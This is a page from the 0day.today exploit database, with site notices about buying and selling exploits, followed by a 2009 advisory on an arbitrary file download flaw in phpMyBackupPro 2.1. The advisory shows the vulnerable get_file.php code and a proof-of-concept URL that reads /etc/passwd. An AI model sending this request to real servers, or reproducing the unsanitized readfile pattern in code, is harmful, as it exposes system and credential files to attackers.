0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Arbitrary File Download in phpMyBackupPro
========================================= Arbitrary File Download in phpMyBackupPro ========================================= ################################################################################ Arbitrary File Download in phpMyBackupPro Name Arbitrary File Download in phpMyBackupPro Systems Affected phpMyBackupPro v 2.1 and possibly earlier versions site http://www.phpmybackuppro.net ################################################################################ ############ 1. OVERVIEW ############ phpMyBackupPro is a web-based MySQL backup application in PHP. You can schedule backups, download, email or upload them with FTP and backup whole file directories. Zip and gzip compression, easy interface and installation. Many languages and online help! ############### 2. DESCRIPTION ############### phpMyBackupPro is vulnerable to Arbitrary File Download. ###################### 3. TECHNICAL DETAILS ###################### Arbritrary File Downlaod ++++++++++++++++++++++++ Vulnerable page get_file.php Vulnerable Parameters view Vulnerable Code --------------------------------------------------------------------------------------- // show the requested file if (isset($_GET['view']) && file_exists($_GET['view'])) { if (isset($_GET['download'])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($_GET['view'])); readfile($_GET['view']); } else { ...... ...... ....... } --------------------------------------------------------------------------------------- The parameter "view" is not properly sanitized which results in Arbitrary file download. ++++ POC ++++ http://localhost/phpMyBackupPro/get_file.php?download=true&view=/etc/passwd ############ 4. TimeLine ############ 20th Oct 2009 Bug Discovered 20th Oct 2009 Reported to Vendor 27th Oct 2009 vendor agreed to the vulnerablity and ready to fix it. 16th Nov 2009 No communication received about the status of the fix. 16th Nov 2009 Public Disclosure # 0day.today [2024-11-15] #